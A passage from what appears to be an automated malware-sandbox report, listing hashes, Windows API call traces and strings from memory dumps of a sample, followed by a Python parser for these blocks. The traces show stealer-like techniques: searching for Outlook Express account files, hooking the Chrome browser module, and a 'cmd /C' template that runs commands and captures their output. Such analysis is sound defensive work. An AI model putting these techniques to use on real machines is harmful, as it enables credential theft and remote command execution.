  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
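Every block above follows the same layout: a `Similarity` header with bulleted key/value lines, an optional decompiled C listing, an `APIs` list in which the indented `Part of subcall function <addr>:` entries belong to a callee rather than to the function itself, and a `Memory Dump Source` footer. In a report this long the triage questions (which blocks carry a string worth pivoting on, which ones reach `CreateProcessA` even if only through a subcall) are easier to answer from structured records than by scrolling. The Python below is an added example written for this page, not Joe Sandbox code; it assumes nothing beyond the layout visible here, and `SAMPLE` is a constructed excerpt whose values are copied from two of the blocks above.

```python
"""Parser for the 'Similarity' function blocks rendered on this page.

Added example, not Joe Sandbox code. It relies only on the layout visible above: a
'Similarity' header, bulleted 'Key: Value' lines, an 'APIs' list whose entries may be
prefixed 'Part of subcall function <addr>:', an optional 'C-Code' listing (skipped),
and a 'Memory Dump Source' footer. SAMPLE is a constructed excerpt whose values are
copied from two blocks of this report."""
import re
from dataclasses import dataclass, field
from typing import Optional

SAMPLE = """Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
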